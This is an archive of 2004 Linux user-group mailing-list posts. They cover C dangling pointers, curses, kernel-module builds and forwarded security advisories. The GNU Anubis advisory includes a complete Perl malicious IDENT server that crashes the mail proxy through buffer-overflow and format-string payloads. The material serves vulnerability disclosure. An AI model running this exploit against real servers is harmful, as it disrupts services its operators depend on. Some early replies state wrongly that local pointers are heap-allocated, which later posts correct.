Re: [ilugd] Re: strcpy local variable in c
On Thu, 2004-03-04 at 15:38, Vikas Upadhyay wrote:
> From: Abhijit Menon-Sen [EMAIL PROTECTED]
> > At 2004-03-04 12:24:25 +0530, [EMAIL PROTECTED] wrote:
> > > According to me, as we have string as local variable, it should vanish. But, I am still able to return and print the string hello world.
> >
> > Returning a pointer to local variables is undefined; that is, there is no guarantee whatsoever about its behaviour. In particular, it doesn't need to vanish (but it may).
>
> By vanish I mean, function gone its data gone. Each function data (unless got through malloc or defined static) is put on its stack frame, so when function returns the stack frame is popped out. So local variable no more exists !!!

Very true when the function returns the stack is emptied and all local variables are deleted. But the pointer is made on the heap not the stack! So you will have to delete the pointer manually. You are taking control away from the compiler and telling it that you are implementing it manually by making a pointer. So if there was a Garbage Collector this is what it would collect. Otherwise like in this case you have a memory leak.

> > So your code works only by accident. I'm surprised that gcc's warnings are defeated by your intermediate assignment (ptr = string), but only a little.
>
> This has been my understanding, but now the problem is - if all that I know is correct, then why, friend, is this working? I have tried it so many times ... but if it's just coincidence, what a beautiful coincidence :-)

As far as gcc warning for ptr=string goes it is not complaining since string is an array and string actually contains the memory address of starting of the array. So since you are assigning address string to ptr it is not complaining and happily proceeding.

Try adding these two statements and changing your foo() function

char * foo()
{
    char string[200];
    char * ptr=NULL;
    strcpy(string,"hello world");
    printf("StrAddr=%p\n",(void *)&string[0]); // Print address of the starting
                                               // of the string
    ptr=string;
    printf("PtrAddr=%p\n",(void *)ptr);        // Print the address of the ptr
                                               // not the contents
    return ptr;                                // as in the original foo()
}

As you will see the above two values are equal.

Regards,
--
Arindam Dey
The mind is not a vessel to be filled but a fire to be kindled.
GPG FPR: B8E3 219E F129 F970 F4A7 BC50 9636 504A BEDF 5739

___
ilugd mailinglist -- [EMAIL PROTECTED]
http://frodo.hserus.net/mailman/listinfo/ilugd
Archives at: http://news.gmane.org/gmane.user-groups.linux.delhi http://www.mail-archive.com/[EMAIL PROTECTED]/
RE: [ilugd] strcpy local variable in c
Hi,

Try this code. Hope you understand the difference now.

Regards,
Venky

#include <stdio.h>
#include <string.h>

char * foo();
char * foo1();

int main()
{
    char string[200];
    char *p;

    p = foo();          /* p holds the address of foo()'s local array */
    foo1();             /* a second call made before p is used */
    strcpy(string,p);   /* reads through the dangling pointer (undefined) */
    printf("String=%s\n",string);
    return 0;
}

char * foo()
{
    char string[200];
    char * ptr=NULL;
    strcpy(string,"hello world");
    ptr=string;
    return ptr;
}

char * foo1()
{
    char string[200];
    char * ptr=NULL;
    strcpy(string,"cruel world");
    ptr=string;
    return ptr;
}

[EMAIL PROTECTED] dvenkat]$ gcc -Wall strcp.c
[EMAIL PROTECTED] dvenkat]$ ./a.out
String=cruel world
[EMAIL PROTECTED] dvenkat]$

My brain is divided into two parts, LEFT and RIGHT, The LEFT has nothing RIGHT in it, And the RIGHT has nothing LEFT in it.

-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] Behalf Of Vikas Upadhyay
Sent: Thursday, March 04, 2004 12:24 PM
To: [EMAIL PROTECTED]
Subject: [ilugd] strcpy local variable in c

Hi all,

I just want to know, why does this C code work?

#include <stdio.h>
#include <string.h>

char * foo();

int main()
{
    char string[200];
    strcpy(string,foo());
    printf("String=%s\n",string);
    return 0;
}

char * foo()
{
    char string[200];
    char * ptr=NULL;
    strcpy(string,"hello world");
    ptr=string;
    return ptr;
}

According to me, as we have string as local variable, it should vanish. But, I am still able to return and print the string hello world.

When I change to :

    char string[200]="hello world";

and do not use strcpy(), it shows junk, the behaviour is as per my expectations.

Does it have something to do with the implementation of strcpy()? So, does it mean that, in case of Windows it might behave differently?

Hope to get some help. Thanks in advance.

vikas
Re: [ilugd] Re: strcpy local variable in c
On Thu, 2004-03-04 at 16:07, Arindam Dey wrote:
> Try adding these two statements and changing your foo() function
>
> char * foo()
> {
>     char string[200];
>     char * ptr=NULL;
>     strcpy(string,"hello world");
>     printf("StrAddr=%p\n",(void *)&string[0]); // Print address of the starting// of the string
>     ptr=string;
>     printf("PtrAddr=%p\n",(void *)ptr); //Print the address of the ptr //not the contents
>     return ptr;
> }

Apologies for replying to my own mail. But I or my MUA made a horrendous formatting error for my comment above. The word starting will be after the beginning of the second // comment starter.

Although I am pretty sure you will correct my ineptitude automatically there was another reason to reply again. You can use the value of the ptr in the main function although it is a local variable because it is made on the heap and thus although the pointer itself is gone meaning you cannot use ptr->something in main but since you have not cleared or freed the memory location using delete() in the function the value stored in the memory location is still present and thus the printf statement in the main is happily printing whatever is stored in that particular memory location. Since the variable string in main has been assigned the memory location or address earlier being used by the ptr in the function foo.

Regards,
--
Arindam Dey
The mind is not a vessel to be filled but a fire to be kindled.
GPG FPR: B8E3 219E F129 F970 F4A7 BC50 9636 504A BEDF 5739
Re: [ilugd] tutorials on curses
harsh sharma wrote:
> can anyone of u please send me the useful links or any matter related to learning curses i do not have any idea about them...so i have to start from the beginning..

Check the `/usr/share/doc/ncurses-devel-5.3/` directory. You will find enough documentation there to get you started.

You should do a thorough research before posting a question. If folks think you have not even tried the obvious step of reading the docs applicable to your problem, they are likely to become annoyed. Here are a few tips :

* Read the man and info pages. Most man and info pages have a `bugs' section. See if that applies to your case.
* Read the program documentation (usually found in `/usr/doc/program_name' or `/usr/share/doc/program_name')

HTH
--
Raj Shekhar
System Administrator, Media Web India
http://www.netphotograph.com
My home: http://geocities.com/lunatech3007
My blog: http://lunatech.journalspace.com
[ilugd] Re: strcpy local variable in c
At 2004-03-04 16:07:16 +0800, [EMAIL PROTECTED] wrote:
> Very true when the function returns the stack is emptied and all local variables are deleted.

That's not true, and it's a very misleading way of thinking about this situation.

Yes, automatic variables (as C calls them) are allocated on the stack, and are not visible outside their defining lexical scope. But when the function returns, neither is the stack emptied, nor are automatic variables deleted. The variables just cease to be visible, but this is not as a result of some active intervention by the system or compiler. There is no deleting happening (in C, anyway; in C++, destructors get called on scope exit).

I mention this in particular because the stack is usually _not_ emptied. The stack pointer is moved, but whatever was on the stack is usually not disturbed. It's no longer on the stack, but that's by definition, not by any explicit destruction.

(This is why automatic variables in C have to be initialised before use. When they're created on the stack, there is no way of telling what might have been there before.)

> But the pointer is made on the heap not the stack! So you will have to delete the pointer manually.

That's not true either, in this case the char * ptr is also automatic. Furthermore, returning it would not cause a memory leak (since there is no malloc() allocation happening).

>     ptr=string;
>     printf("PtrAddr=%p\n",(void *)ptr); //Print the address of the ptr //not the contents
> }
>
> As you will see the above two values are equal.

Of course the two values are equal. That's not the point. The point is that returning the address of an automatic variable is incorrect, and the compiler should warn about such things. If you do return string, gcc does warn you, but I expect detecting ptr=string; return ptr is too expensive, or opens up too many hard-to-detect equivalents.

-- ams
[ilugd] Re: strcpy local variable in c
At 2004-03-04 13:22:02 +0530, [EMAIL PROTECTED] wrote:
> *No* valid assumptions can be made with respect to undefined behaviour. You cannot even expect it to not work.

Oh, and just as an illustration of what this means, according to the C standard, the behaviour of #pragma is implementation defined. So GCC used to start nethack. (No longer, though. It's been #ifdef'd out for many years, and I think the code is finally gone now.)

-- ams
Re: [ilugd] Re: tutorials on curses
Hey, if you guys are interested in snake-charmers, poisonous curses and stuff try out curses with pythons:

http://www.amk.ca/python/howto/curses/
http://www-106.ibm.com/developerworks/linux/library/l-python6.html?dwzone=linux

I don't know what exactly our good friend wanted to do with curses, but you could probably get more mileage using a scripting lingo like python/perl with curses. While I am at it, Java has pretty poor curses support (one of my pet peeves).

> Date: Thu, 04 Mar 2004 13:39:51 +0800
> From: Arindam Dey [EMAIL PROTECTED]
> Subject: Re: [ilugd] tutorials on curses
>
> On Thu, 2004-03-04 at 13:16, vivek khurana wrote:
> http://www.themystica.com/mystica/articles/c/curses.html never to be found again. now thanks to Mr. Dey, i again have access to vast amount of information on occult, mysticism, magical paranormal stuff. in fact i should thank Mr. Dey for that
Re: [ilugd] Re: strcpy local variable in c
> Very true when the function returns the stack is emptied and all local variables are deleted. But the pointer is made on the heap not the stack! So you will have to delete the pointer manually. You are taking control away from the compiler and telling it that you are implementing it manually by making a pointer. So if there was a Garbage Collector this is what it would collect. Otherwise like in this case you have a memory leak.

Do you mean a variable declared pointer is declared space on heap ?? Well as per my information, when a pointer is created it being a variable is created on stack (as it's a local variable). But if memory is assigned to it through malloc (or through its brother/sister) the memory is allocated on heap. So the variable, even though it's declared a pointer will cease to exist once the function is returned - so no memory leak in this case.

Still I am not 100% sure about what I have said, but when I tried to print the *address* of a pointer (local to a function), and address of other variable (not a pointer) I saw two addresses close to each other (variable - 0xb8dc pointer - 0xb8e0).

> > So your code works only by accident. I'm surprised that gcc's warnings are defeated by your intermediate assignment (ptr = string), but only
>
> As far as gcc warning for ptr=string goes it is not complaining since string is an array and string actually contains the memory address of starting of the array. So since you are assigning address string to ptr it is not complaining and happily proceeding.

Yes, I agree that there should not be any warning at all. I got confused because when one directly tries to return address of local variable, gcc complains. I really mixed up two. thanx.

Still frnds, I am not very clear !!!

regards,
vikas
Re: [ilugd] Re: strcpy local variable in c
On Thu, 2004-03-04 at 16:56, Abhijit Menon-Sen wrote:
> [snipped some excellent discourse by AMS]

Thank you very much for clearing that up. I was pretty mistaken about the stack and heap thing. I had totally forgotten about the malloc thing have been using new and delete for quite a while now :-). Looks like should open the books again.

Regards,
--
Arindam Dey
The mind is not a vessel to be filled but a fire to be kindled.
GPG FPR: B8E3 219E F129 F970 F4A7 BC50 9636 504A BEDF 5739
RE: [ilugd] Re: strcpy local variable in c
-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] lhi.org]On Behalf Of Vikas Upadhyay
Sent: Thursday, March 04, 2004 2:41 PM
To: The Linux-Delhi mailing list
Subject: Re: [ilugd] Re: strcpy local variable in c

-- snip

> Still frnds, I am not very clear !!!

It's very simple, what GCC did was create an array and put hello world at those memory locations. When you returned, you just returned an address. GCC marked those memory locations as reusable but it wouldn't go to the extent of erasing the memory locations. Why should it, after all C has no garbage collector. And hello world is as much a useless string as any other string sdfhd#afddf.

Now when foo1 was called in the program I had sent, you will see that it again used the same memory locations, but this time I had written cruel world. When you are calling printf, p has an address which was returned to it by foo (). It goes to the address and prints the contents there which have now changed to cruel world.

To understand it in more detail: Every function has three parts

    The Prologue
    The Main body
    The Epilogue

The Prologue stores the Callee Save registers on the stack and sets the PR register. Callee Save registers whose values should not change across the function call. So, the value they contained before you called foo, should be there after foo.

In the main body, at the end of it, the compiler ensures that the Register (say R0) which is marked as the return value registers in the ABI for the architecture, contains the return value. So, R0 (for x86) has the return value (that is just an address of string in your case).

The Epilogue then starts unwinding the stack so that the Stack Pointer and all the Callee Save registers are brought back to the state in which they were before the function had been called. The last assembly instruction in the Main body is generally the rts instruction which tells the function to return.

As far as p = foo () is concerned, the compiler would have generated instructions to set p to the value of R0, that's all.

When I called foo1 again, the compiler knew that the memory for the local array string defined in foo is no longer required and it proceeds to give the same memory locations to string in foo1. So, accidentally (or is it, :-)), now those memory locations contain cruel world, which is printed.

I would suggest you read the ABI for x86 and take a look at the assembly file generated, and you will find out easily.

    gcc -g foo.c

You could use -fno-schedule-insns2 to disable instruction scheduling.

    gcc -g -fno-schedule-insns2 foo.c
    objdump --source --disassemble a.out > foo.lst

Your dump is in foo.lst.

Even if GCC did have a garbage collector, I wonder if it would actually try to erase the locations. After all, as I said earlier, hello world is as much a useless string as any other string sdfhd#afddf (once the function has returned), so why go to the trouble at all?

Hope that answers your question. :-)

> regards,
> vikas

Venky
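The fix for the pattern this thread discusses (Abhijit's point that returning the address of an automatic variable is incorrect, and Venky's foo()/foo1() experiment), as an added example that is not code from any of the posters. The function names are hypothetical; the experiment is repeated against two well-defined ways of handing a string back to the caller.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/*
 * The pattern from the thread, kept as a comment because using its result
 * is undefined behaviour:
 *
 *     char *foo(void) { char string[200]; char *ptr = string;
 *                       strcpy(string, "hello world"); return ptr; }
 */

/* Fix 1: the caller owns the storage and passes its size.
 * Returns 0 on success, -1 on bad arguments or if text does not fit. */
int greet_into(char *dst, size_t dst_size, const char *text)
{
    size_t need;

    if (dst == NULL || dst_size == 0 || text == NULL)
        return -1;
    need = strlen(text) + 1;            /* include the terminating NUL */
    if (need > dst_size) {
        dst[0] = '\0';                  /* fail closed, never overflow */
        return -1;
    }
    memcpy(dst, text, need);
    return 0;
}

/* Fix 2: heap copy that outlives the call; the caller must free() it. */
char *greet_dup(const char *text)
{
    size_t need;
    char *copy;

    if (text == NULL)
        return NULL;
    need = strlen(text) + 1;
    copy = malloc(need);
    if (copy != NULL)
        memcpy(copy, text, need);
    return copy;
}

/* Stands in for foo1(): fills its own 200-byte automatic array, the kind of
 * call that replaced "hello world" with "cruel world" in the experiment. */
size_t clobber_stack(void)
{
    char string[200];

    memset(string, 'X', sizeof string - 1);
    string[sizeof string - 1] = '\0';
    return strlen(string);
}

/* The foo()/foo1() experiment against the fixed functions.
 * Returns 1 if both strings are intact after the second call. */
int survives_second_call(void)
{
    char local[200];
    char *heap;
    int ok;

    if (greet_into(local, sizeof local, "hello world") != 0)
        return 0;
    heap = greet_dup("hello world");
    if (heap == NULL)
        return 0;
    (void)clobber_stack();
    ok = strcmp(local, "hello world") == 0 &&
         strcmp(heap, "hello world") == 0;
    free(heap);
    return ok;
}

/* A destination that is too small is rejected instead of overflowed. */
int rejects_oversized(void)
{
    char small[4] = "abc";

    return greet_into(small, sizeof small, "hello world") == -1 &&
           small[0] == '\0';
}

int main(void)
{
    printf("intact after second call: %d\n", survives_second_call());
    printf("oversized copy rejected:  %d\n", rejects_oversized());
    return 0;
}
```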
[ilugd] facing problem in putting a kernel module
Hi

I am a newbie to kernel module programming. I have just written a code as follows. But when I run make then it says printk not found and all. Looks like some kernel header files are missing. Is there anybody who has tried and knows how to make it work?

/* hello-2.c - Demonstrating the module_init() and module_exit() macros.
 * This is the preferred over using init_module() and cleanup_module().
 */
#include <linux/module.h>   // Needed by all modules
#include <linux/kernel.h>   // Needed for KERN_ALERT
#include <linux/init.h>     // Needed for the macros

static int hello_2_init(void)
{
    printk(KERN_ALERT "Hello, world 2\n");
    return 0;
}

static void hello_2_exit(void)
{
    printk(KERN_ALERT "Goodbye, world 2\n");
}

module_init(hello_2_init);
module_exit(hello_2_exit);

here is the makefile

TARGET  := hello-2
WARN    := -W -Wall -Wstrict-prototypes -Wmissing-prototypes
INCLUDE := -isystem /lib/modules/`uname -r`/build/include
CFLAGS  := -O2 -DMODULE -D__KERNEL__ ${WARN} ${INCLUDE}
CC      := gcc-3.0

${TARGET}.o: ${TARGET}.c

.PHONY: clean

clean:
	rm -rf ${TARGET}.o
Re: [ilugd] facing problem in putting a kernel module
> Hi I am a newbie to kernel module programming

me too ;-)

> here is the makefile
> CFLAGS := -O2 -DMODULE -D__KERNEL__ ${WARN} ${INCLUDE}

add '-c' to this line as you want an elf object file not an elf executable.

> ${TARGET}.o: ${TARGET}.c

alternately change above to

/* use (GCC) not {GCC} (better this way)*/
.o:
	$(GCC) ${CFLAGS} -c $^.c

regards
samveen

man (n). life support system for a c**k
[ilugd] Re: facing problem in putting a kernel module
[EMAIL PROTECTED] wrote:
> But when I run make then it says printk not found and all. Looks like some kernel header files are missing. Is there anybody who has tried and knows how to make it work?

From your Makefile

    INCLUDE:=-isystem /lib/modules/`uname -r`/build/include

Does this directory exist? What is the output of

    # ls /lib/modules/`uname -r`/build/include

Have you got the kernel sources+headers installed?

-Tarun
[ilugd] [Weird] Postgresql vs Oracle
Hi! Everyone

This is a slightly weird question. I am having this debate with a friend of mine. We can't reach a conclusion so I am bringing it to this platform.

Q. Which is a better DB for serving enterprise needs, Postgresql or Oracle (comparison in terms of support, cost, platform independence, deployment in critical situations etc.)?

with regards
vivek

Linux Rules!
Message void if penguin violated
Don't mess with the penguin

Disclaimer: The facts expressed here belong to everybody, the opinions to me. The distinction is yours to draw...
[ilugd] Linux software + acctg proj
[Bouncing at Sanjay's request, with editing. Anyone in a position to help him out with the CDs and software he needs? -- Raju]

Dear Raj

Going ahead from LinuxAsia, I'm trying to set up some demo Linux at a client's office in Rajasthan and need to get some software - details below. (There's a Linux geek from Ireland who is visiting there and he would be doing the technical stuff.)

SOFTWARE NEEDS

* Mandrake 9.0 or higher preferably 9.2 -- 3cd installation set
* CD of Mandrake updates to 9.0 -- if possible
* OOo 1.1 for Win and Linux
* Adabas
* LTSP client and server
* Tight VNC for windows.
* Koha 2.0 in RPM or preferably latest version in .tar.gz of 2.0rc4
* Hindi OO - I am really keen on this, tried getting it installed by the CDAC people but there are problems with the font installation still, after some emails back and forth with them. Have you had any better luck? Or anybody else? (I already have Bhartiya)

Going out tomorrow afternoon for a few days, back Sunday evening for a couple of days, then off to Rajasthan Tuesday evening... do you think we can get this organised between Monday and Tuesday?

sanjay

Sanjay Kumar
8/9 Sarvapriya Vihar, New Delhi 110016
Phone: +(91-11) (Off) + 2652 7605; (Res:) + 2612 1911
[ilugd] Online Programming Contest notification
Hello all,

We are students from Department of CSE, Thiagarajar college of Engineering, Madurai, Tamil Nadu, India. We are conducting an online programming contest as part of our National level technical symposium (Cyber 2004) on 7th March. We welcome people who are interested in programming to participate in this event. Please send this mail to your mailing list.

To register in this event: http://www.cyber-tce.org/ProgramRegister.html
For further details: http://www.cyber-tce.org (Cyber 2004 home page)

Thanking You,
Cyber 04 Crew.
Re: [ilugd] How do I record LPs using a Linux Box?
As I understand it, you want your LPs converted to something digital... the answer is simple... irrespective of which OS you use... what you need to do is tap into the output of the player, and put that into the Line In port of your soundcard.

There are several ways of doing this. You can look for a headphone jack on the player, and use the output from that to go to the line in. All you need is a wire with the convenient jacks. The jacks are easily available at your tv/audio repair shops. Your sound card will require a headphone jack (the kind that fits into most walkmans/discmans)... I can't say with any degree of certainty what our player output will be like.

There are other ways of getting around this if your player does not have a headphone jack... look for AUX outs... typical R1R2 cables will be able to give you the input on the comp. This is actually a better method of getting the sound in as you're going to be getting it in stereo. If you ever connected your deck to your comp, just reverse the process... put output jack you use from the comp into the line in (of the comp) and the input ends of the deck (RCA jacks) into the AUX out of the Record player.

There are several sound recorders available for linux, and they can record in several formats including MP3. If you're looking at sound quality (quality will vary on the quality of the LP being recorded and the method you use to record it...) then choose bitrates in excess of 192Kbps.

For the software bit check out the following link...
http://www.ibiblio.org/pub/Linux/apps/sound/recorders/

Keep in mind what you said about the beer... :)

Aman

--- Ashwin Baindur [EMAIL PROTECTED] wrote:
> Dear all,
>
> I've got a stackful of LPs. Irreplaceable to me. I want to record them, myself. I've got a Comp with Red Hat 8.0, a borrowed laptop with Mandrake 9.2 and a Record Player (currently in disrepair). Can anyone tell me what hardware and software I need? Yes, I am googling and I am starting to go through the chaff.
>
> If anyone knows how, would really appreciate his help in putting it up. Free beer promised during sessions.
>
> Thanx in advance,
> AshLin
[ilugd] (fwd) [SECURITY] [DSA 455-1] New libxml packages fix arbitrary code execution
[Please upgrade if you have libxml or libxml2 installed -- Raju]

This is an RFC 1153 digest. (1 message)
----------------------------------------------------------------------
Message-Id: [EMAIL PROTECTED]
From: [EMAIL PROTECTED] (Martin Schulze)
To: [EMAIL PROTECTED]
Subject: [SECURITY] [DSA 455-1] New libxml packages fix arbitrary code execution
Date: Thu, 4 Mar 2004 11:22:56 +0100 (CET)

Debian Security Advisory DSA 455-1      [EMAIL PROTECTED]
http://www.debian.org/security/         Martin Schulze
March 3rd, 2004                         http://www.debian.org/security/faq

Package        : libxml, libxml2
Vulnerability  : buffer overflows
Problem-Type   : remote
Debian-specific: no
CVE ID         : CAN-2004-0110

libxml2 is a library for manipulating XML files.

Yuuichi Teranishi discovered a flaw in libxml, the GNOME XML library. When fetching a remote resource via FTP or HTTP, the library uses special parsing routines which can overflow a buffer if passed a very long URL. If an attacker is able to find an application using libxml1 or libxml2 that parses remote resources and allows the attacker to craft the URL, then this flaw could be used to execute arbitrary code.

For the stable distribution (woody) this problem has been fixed in version 1.8.17-2woody1 of libxml and version 2.4.19-4woody1 of libxml2.

For the unstable distribution (sid) this problem has been fixed in version 1.8.17-5 of libxml and version 2.6.6-1 of libxml2.

We recommend that you upgrade your libxml1 and libxml2 packages.

Upgrade Instructions

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the footer to the proper configuration.
[ilugd] (fwd) GNU Anubis buffer overflows and format string bugs
[Please upgrade if you use GNU Anubis. Binary-encoded exploit snipped -- Raju] This is an RFC 1153 digest. (1 message) -- Message-ID: [EMAIL PROTECTED] From: Ulf =?iso-8859-1?b?SORybmhhbW1hcg==?= [EMAIL PROTECTED] Sender: [EMAIL PROTECTED] To: [EMAIL PROTECTED] Cc: [EMAIL PROTECTED] Subject: [Full-Disclosure] GNU Anubis buffer overflows and format string bugs Date: Thu, 4 Mar 2004 20:19:40 +0100 GNU Anubis buffer overflows and format string bugs PROGRAM: GNU Anubis VENDOR: Free Software Foundation, Inc. HOMEPAGE: http://www.gnu.org/software/anubis/ VULNERABLE VERSIONS: 3.6.2, 3.9.93, 3.9.92, 3.6.0, 3.6.1, possibly others IMMUNE VERSIONS: 3.6.2 with vendor patch, 3.9.93 with vendor patch, latest CVS REFERENCES: not yet * DESCRIPTION * GNU Anubis is an outgoing mail processor. It goes between the MUA (Mail User Agent) and the MTA (Mail Transport Agent), and can perform various sorts of processing and conversion on-the-fly in accordance with the sender's specified rules, based on a highly configurable regular expressions system. It operates as a proxy server, and can edit outgoing mail headers, encrypt or sign mail with the GnuPG, build secure SMTP tunnels using the TLS/SSL encryption even if your mail user agent doesn't support it, or tunnel a connection through a SOCKS proxy server. (quoted from freshmeat.net) * SUMMARY * I have found two buffer overflows and three format string bugs in GNU Anubis. They can all be remotely exploited, potentially to get root access, as GNU Anubis usually runs as root and drops its privileges after executing some of the vulnerable functions. * TECHNICAL DETAILS * a) There are two buffer overflows in the function auth_ident() in auth.c. The overflows are caused by sscanf() format strings of the type %s instead of %63s. b) There are format string bugs in three instances of the syslog() call. They are located in the function info() in log.c, the function anubis_error() in errs.c and the function ssl_error() in ssl.c. 
The vulnerable functions take strings partially made up of user-supplied data, and use them as the format string instead of using them as parameters ('syslog(priority, string);' instead of 'syslog(priority, "%s", string);'). These format string bugs become a bigger problem if you set termlevel to VERBOSE or DEBUG, as GNU Anubis then will log more data with the syslog() facility.

* SOLUTION *

The vendor has released official security patches for 3.6.2 and 3.9.93. They can be downloaded from the program's homepage. They correct both the buffer overflows and the format string bugs.

* MALICIOUS IDENT SERVER *

One of the methods of attacking GNU Anubis is through IDENT data, as it always connects to the client's IDENT server to get more information about the client.

I wrote a simple malicious IDENT server in Perl. It crashes the current instance of GNU Anubis, either by using the buffer overflows or by using the format string bugs. Here it is:

#!/usr/bin/perl --

# anubis-crasher
# Ulf Harnhammar 2004
# I hereby place this program in the Public Domain.

use IO::Socket;

sub usage()
{
  die "usage: $0 type\n".
      "type is 'a' (buffer overflow) or 'b' (format string bug).\n";
} # sub usage

$port = 113;

usage() unless @ARGV == 1;
$type = shift;
usage() unless $type =~ m|^[ab]$|;

$send{'a'} = 'U' x 400;
$send{'b'} = '%n' x 28;
$sendstr = $send{$type};

$server = IO::Socket::INET->new(Proto => 'tcp',
                                LocalPort => $port,
                                Listen => SOMAXCONN,
                                Reuse => 1) or
  die "can't create server: $!";

while ($client = $server->accept())
{
  $client->autoflush(1);
  print "got a connection\n";

  $input = <$client>;
  $input =~ tr/\015\012//d;
  print "client said $input\n";

#  $wait = <STDIN>;
#  $wait = 'be quiet, perl -wc';

  $output = "a: USERID: a:$sendstr";
  print $client "$output\n";
  print "I said $output\n";

  close $client;
  print "disconnected\n";
} # while client=server->accept

__END__

* 31337 IRC KIDDIES *

K: w0w d00d m0r3 buphph3r 0v3rphl0wzZz 4nd ph0rm4t zZztr1ngzZz!!1!
but why d0 y4 p0zZzt 4b0ut th4t xss ph1lt3r??+??+? w3 1n 'h4ck3rzZz phr0m h3ll' r n0t 4muzZz3d!! xss 1zZzn't r34lly 4 vuln3r4b1l1ty c0z 1t'zZz 34zZzy t0 3xpl01t th4t vuln3r4b1l1ty 4nd th3n u c4n't pr00v3 h0w 31337 u r!!! th3 n31ghb0ur'zZz d4ught3r 1zZz r34lly cut3 4nd 1ph 1 ph1nd l0tzZz 0ph buphph3r 0v3rphl0wzZz zZzh3'll b3 1mpr3zZzZzZ3d 4nd g0 t0 th3 m0v13zZz w1th m3 but th4t w0n't h4pp3n 1ph 1 ph1nd xss h0l3zZz11!!!1!!11

U: Virgin.

(Anyone on IRC who doesn't behave like K here is of course OK.)

// Ulf Harnhammar
kses - 31337 PHP HTML/XHTML filter (no XSS)
http://sourceforge.net/projects/kses

___
Full-Disclosure - We believe in it.
Charter:
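The two bug classes named in the advisory above (an unbounded %s in sscanf() and peer data used as the syslog() format), shown in hardened form. This is an added example, not part of the original post and not GNU Anubis code: parse_ident(), log_ident(), FIELD and the sample replies are assumptions made for illustration, with the reply layout taken from RFC 1413.

```c
#include <stdio.h>
#include <string.h>
#include <syslog.h>

#define FIELD 64 /* assumed buffer size: 63 characters plus NUL, hence %63s */

/* Parse an IDENT reply laid out as "<ports> : USERID : <os> : <user>".
 * The advisory's overflow pattern is a bare %s, which lets the peer write
 * past the buffer. Returns 0 on success, -1 if malformed or oversized. */
int parse_ident(const char *reply, char os[FIELD], char user[FIELD])
{
    int used = 0;
    /* Every string conversion carries a width one less than its buffer. */
    if (sscanf(reply, " %*[^:]: USERID : %63[^:]: %63s%n", os, user, &used) != 2)
        return -1;
    /* Anything left besides CR/LF means the user field was cut short. */
    if (reply[used + strspn(reply + used, "\r\n")] != '\0')
        return -1;
    return 0;
}

/* Log the peer-supplied name. The advisory's bug is syslog(priority, string);
 * here peer data is only ever an argument, never the format. Returns the
 * message length, or -1 if it does not fit in msg. */
int log_ident(const char *user, char *msg, size_t msgsz)
{
    int n = snprintf(msg, msgsz, "ident user: %s", user);
    if (n < 0 || (size_t)n >= msgsz)
        return -1;
    syslog(LOG_INFO, "%s", msg); /* not: syslog(LOG_INFO, msg); */
    return n;
}

int main(void)
{
    /* Constructed sample replies, not captured traffic. */
    const char *samples[] = {
        "6193, 23 : USERID : UNIX : stjohns\r\n",
        "a: USERID: a:%n%n%n%n\r\n",
    };
    char os[FIELD], user[FIELD], msg[128];
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        if (!parse_ident(samples[i], os, user) && log_ident(user, msg, sizeof msg) > 0)
            printf("accepted: %s\n", msg);
        else
            printf("rejected reply %zu\n", i);
    }
    return 0;
}
```

The conversion specifiers in the second reply are logged as literal text because they reach syslog() only as the argument to "%s".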
[ilugd] (fwd) Abobe Reader 5.1 XFDF Buffer Overflow Vulnerability
[Please upgrade if you use Adobe Acrobat Reader -- Raju]

This is an RFC 1153 digest.
(1 message)

--

MIME-Version: 1.0
Content-Type: text/plain; format=flowed; charset=iso-8859-1; reply-type=original
Content-Transfer-Encoding: 7bit
Message-ID: [EMAIL PROTECTED]
From: NGSSoftware Insight Security Research [EMAIL PROTECTED]
To: [EMAIL PROTECTED], [EMAIL PROTECTED], [EMAIL PROTECTED]
Subject: Abobe Reader 5.1 XFDF Buffer Overflow Vulnerability
Date: Wed, 3 Mar 2004 23:18:54 -

NGSSoftware Insight Security Research Advisory

Name: Adobe Acrobat Reader XML Forms Data Format Buffer Overflow
Systems Affected: Adobe Acrobat Reader version 5.1
Severity: High Risk
Vendor URL: http://www.adobe.com/
Author: David Litchfield [ [EMAIL PROTECTED] ]
Date Vendor Notified: 7th February 2004
Date of Public Advisory: 3rd March 2004
Advisory number: #NISR03022004
Advisory URL: http://www.ngssoftware.com/advisories/adobexfdf.txt

Description
***

Adobe Acrobat Reader is a viewer that renders PDF documents. The Reader can be extended using the XML Forms Data Format or XFDF. XFDF is a format for representing forms data and annotations in a PDF document. XFDF files have a .xfdf extension and are rendered automatically on download when using applications such as Internet Explorer. Also note that, regardless of the file extension, if the MIME type is set to application/vnd.adobe.xfdf the file will be treated as an XFDF. When parsing an XFDF document the Adobe Reader suffers from a classic stack based buffer overflow vulnerability.

Details
***

When the xfdf file is parsed an unsafe call to sprintf is made in preparation for outputting a debug message using OutputDebugString. Whether the process is being debugged or not the vulnerable code is still called. Rendering the file will trigger the overflow. A user would need to be enticed to a web site that hosted a malicious xfdf file or sent one via e-mail.

Fix Information
***

On contacting Adobe, they confirmed that the current version is no longer vulnerable and NGSSoftware urgently advises users of Adobe Reader to upgrade.

http://www.adobe.com/support/downloads/main.html

About NGSSoftware
*

NGSSoftware design, research and develop intelligent, advanced application security assessment scanners. Based in the United Kingdom, NGSSoftware have offices in the South of London and the East Coast of Scotland. NGSSoftware's sister company NGSConsulting, offers best of breed security consulting services, specialising in application, host and network security assessments.

http://www.ngssoftware.com/

Telephone +44 208 401 0070
Fax +44 208 401 0076

[EMAIL PROTECTED]

--

End of this Digest
**

--
Raj Mathur [EMAIL PROTECTED] http://kandalaya.org/
GPG: 78D4 FC67 367F 40E2 0DD5 0FEF C968 D0EF CC68 D17F
It is the mind that moves
[ilugd] RE: [LIH]Fastest method of installation
:: -Original Message-
:: From: Yashpal Nagar
:: criteria for choosing best in terms of fast data transfer /
:: reliability easiness or lesser work to perform, over the
:: network of (10 Mb/s)

FTP will probably be the fastest considering just the protocol, but you might find NFS the best choice given your requirements constraints.

--
Ravi